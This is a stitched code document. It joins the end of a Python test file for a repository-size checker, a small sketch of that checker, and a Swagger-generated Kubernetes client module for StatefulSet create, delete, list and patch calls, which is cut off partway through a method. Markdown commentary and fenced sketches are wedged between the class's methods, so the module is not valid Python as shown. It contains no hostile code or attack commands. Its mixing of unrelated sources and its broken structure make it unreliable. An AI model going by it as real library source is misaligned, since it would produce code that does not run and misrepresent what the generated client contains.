output = repo_is_too_large(general_repo_path, directories_to_skip, max_py_files_count)
assert output is None
def test_repo_size_ok_double(general_repo_path, general_repo_origin_path):
max_py_files_count = 1000
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(
general_repo_path,
directories_to_skip,
max_py_files_count,
general_repo_origin_path
)
assert output is None
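These tests pin down the contract of `repo_is_too_large`: it returns an error string when the repository holds more `.py` files than `max_py_files_count` (skipping `directories_to_skip`, optionally counting a second repo path too), and `None` otherwise. A hypothetical stand-in with that contract, not fiasko_bro's actual implementation:

```python
import os
import tempfile

def repo_too_large_sketch(repo_path, directories_to_skip, max_py_files_count):
    """Return an error string when repo_path holds more than
    max_py_files_count .py files (skipping the named directories),
    None otherwise."""
    py_files = 0
    for root, dirs, files in os.walk(repo_path):
        # prune skipped directories in place so os.walk never descends
        dirs[:] = [d for d in dirs if d not in directories_to_skip]
        py_files += sum(1 for name in files if name.endswith('.py'))
    if py_files > max_py_files_count:
        return 'repo has %d .py files, max is %d' % (py_files, max_py_files_count)
    return None

# quick demonstration on a throwaway directory holding two .py files
demo = tempfile.mkdtemp()
for name in ('a.py', 'b.py'):
    open(os.path.join(demo, name), 'w').close()
print(repo_too_large_sketch(demo, [], 1))   # repo has 2 .py files, max is 1
print(repo_too_large_sketch(demo, [], 10))  # None
```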
# k8sclient/apis/apps_v1alpha1_api.py (Arvinhub/client-python @ d67df30f635231d68dc4c20b9b7e234c616c1e6a, Apache-2.0)
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: unversioned
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class AppsV1alpha1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_apps_v1alpha1_namespaced_stateful_set(self, namespace, body, **kwargs):
"""
create a StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_apps_v1alpha1_namespaced_stateful_set(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, body, **kwargs)
return data
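Every method's docstring above describes the same dispatch: synchronous by default, or asynchronous when a `callback` is supplied, in which case the request runs on another thread and the thread is returned. Reduced to a stdlib sketch; `call_api_sketch` is illustrative, not the generated client's real internals:

```python
import threading

def call_api_sketch(request_fn, *args, callback=None, **kwargs):
    """Synchronous by default; with a callback, run the request on a
    worker thread, hand the response to the callback, and return the
    thread so the caller can join() it."""
    if callback is None:
        return request_fn(*args, **kwargs)
    thread = threading.Thread(
        target=lambda: callback(request_fn(*args, **kwargs)))
    thread.start()
    return thread

# synchronous path returns the response directly
assert call_api_sketch(lambda n: n + 1, 41) == 42

# asynchronous path delivers the response to the callback
results = []
worker = call_api_sketch(lambda n: n + 1, 41, callback=results.append)
worker.join()
assert results == [42]
```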
def create_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, namespace, body, **kwargs):
"""
create a StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
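The `_with_http_info` variants all begin with the same guard: keyword arguments are checked against an explicit allow-list (`all_params`) and anything unexpected raises `TypeError`. The same guard in plain modern Python; `validate_kwargs` is an illustrative name, not part of the generated client:

```python
def validate_kwargs(method_name, all_params, **kwargs):
    """Accept only keyword arguments named in all_params, mirroring the
    TypeError the generated methods raise for anything else."""
    params = {}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method %s"
                % (key, method_name))
        params[key] = val
    return params

print(validate_kwargs('create_namespaced_stateful_set',
                      ['namespace', 'body', 'pretty'],
                      namespace='default', pretty='true'))
# {'namespace': 'default', 'pretty': 'true'}
```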
def delete_apps_v1alpha1_collection_namespaced_stateful_set(self, namespace, **kwargs):
"""
delete collection of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_apps_v1alpha1_collection_namespaced_stateful_set(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(namespace, **kwargs)
return data
def delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(self, namespace, **kwargs):
"""
delete collection of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_apps_v1alpha1_collection_namespaced_stateful_set" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_apps_v1alpha1_collection_namespaced_stateful_set`")

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)

    def delete_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, body, **kwargs):
        """
        delete a StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_apps_v1alpha1_namespaced_stateful_set(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
        else:
            (data) = self.delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
            return data

    def delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, body, **kwargs):
        """
        delete a StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param V1DeleteOptions body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: UnversionedStatus
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_apps_v1alpha1_namespaced_stateful_set" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_apps_v1alpha1_namespaced_stateful_set`")
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_apps_v1alpha1_namespaced_stateful_set`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `delete_apps_v1alpha1_namespaced_stateful_set`")

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedStatus',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)
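    # Illustrative sketch (not part of the generated client): the delete calls
    # above take a `V1DeleteOptions body`. A minimal sense of what that body
    # serializes to on the wire, assuming the standard Kubernetes DeleteOptions
    # field names; the concrete values here are arbitrary examples.

```python
import json

# Hypothetical DeleteOptions payload for a StatefulSet delete request.
# Field names follow Kubernetes API conventions (gracePeriodSeconds,
# propagationPolicy); values are illustrative, not recommendations.
delete_options = {
    "apiVersion": "v1",
    "kind": "DeleteOptions",
    "gracePeriodSeconds": 0,
    "propagationPolicy": "Foreground",
}

# The client ultimately serializes the body object to JSON like this.
payload = json.dumps(delete_options, sort_keys=True)
```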

    def get_apps_v1alpha1_api_resources(self, **kwargs):
        """
        get available resources
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_apps_v1alpha1_api_resources(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: UnversionedAPIResourceList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_apps_v1alpha1_api_resources_with_http_info(**kwargs)
        else:
            (data) = self.get_apps_v1alpha1_api_resources_with_http_info(**kwargs)
            return data

    def get_apps_v1alpha1_api_resources_with_http_info(self, **kwargs):
        """
        get available resources
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_apps_v1alpha1_api_resources_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: UnversionedAPIResourceList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_apps_v1alpha1_api_resources" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UnversionedAPIResourceList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)

    def list_apps_v1alpha1_namespaced_stateful_set(self, namespace, **kwargs):
        """
        list or watch objects of kind StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_apps_v1alpha1_namespaced_stateful_set(namespace, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: V1alpha1StatefulSetList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.list_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, **kwargs)
        else:
            (data) = self.list_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, **kwargs)
            return data

    def list_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, namespace, **kwargs):
        """
        list or watch objects of kind StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: V1alpha1StatefulSetList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_apps_v1alpha1_namespaced_stateful_set" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `list_apps_v1alpha1_namespaced_stateful_set`")

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1alpha1StatefulSetList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)
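    # Minimal sketch (not part of the generated client): the list/watch
    # methods above translate their snake_case keyword arguments into the
    # camelCase query parameters the Kubernetes API expects, one `if` per
    # parameter. The same mapping can be expressed as a small table; the
    # helper name `to_query_params` is hypothetical.

```python
# Mapping from the client's snake_case kwargs to wire-level query keys,
# mirroring the hand-written `if 'x' in params:` blocks above.
PARAM_MAP = {
    'pretty': 'pretty',
    'field_selector': 'fieldSelector',
    'label_selector': 'labelSelector',
    'resource_version': 'resourceVersion',
    'timeout_seconds': 'timeoutSeconds',
    'watch': 'watch',
}

def to_query_params(**kwargs):
    """Drop unset (None) values and rename keys to their wire names."""
    return {PARAM_MAP[k]: v for k, v in kwargs.items()
            if k in PARAM_MAP and v is not None}

query = to_query_params(label_selector='app=web', watch=True, pretty=None)
# query == {'labelSelector': 'app=web', 'watch': True}
```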

    def list_apps_v1alpha1_stateful_set_for_all_namespaces(self, **kwargs):
        """
        list or watch objects of kind StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_apps_v1alpha1_stateful_set_for_all_namespaces(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: V1alpha1StatefulSetList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(**kwargs)
        else:
            (data) = self.list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(**kwargs)
            return data

    def list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(self, **kwargs):
        """
        list or watch objects of kind StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_apps_v1alpha1_stateful_set_for_all_namespaces_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: V1alpha1StatefulSetList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_apps_v1alpha1_stateful_set_for_all_namespaces" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/statefulsets'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'field_selector' in params:
            query_params['fieldSelector'] = params['field_selector']
        if 'label_selector' in params:
            query_params['labelSelector'] = params['label_selector']
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'resource_version' in params:
            query_params['resourceVersion'] = params['resource_version']
        if 'timeout_seconds' in params:
            query_params['timeoutSeconds'] = params['timeout_seconds']
        if 'watch' in params:
            query_params['watch'] = params['watch']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1alpha1StatefulSetList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)

    def patch_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, body, **kwargs):
        """
        partially update the specified StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1alpha1StatefulSet
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
        else:
            (data) = self.patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
            return data

    def patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, body, **kwargs):
        """
        partially update the specified StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1alpha1StatefulSet
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_apps_v1alpha1_namespaced_stateful_set" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_apps_v1alpha1_namespaced_stateful_set`")
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `patch_apps_v1alpha1_namespaced_stateful_set`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_apps_v1alpha1_namespaced_stateful_set`")

        collection_formats = {}

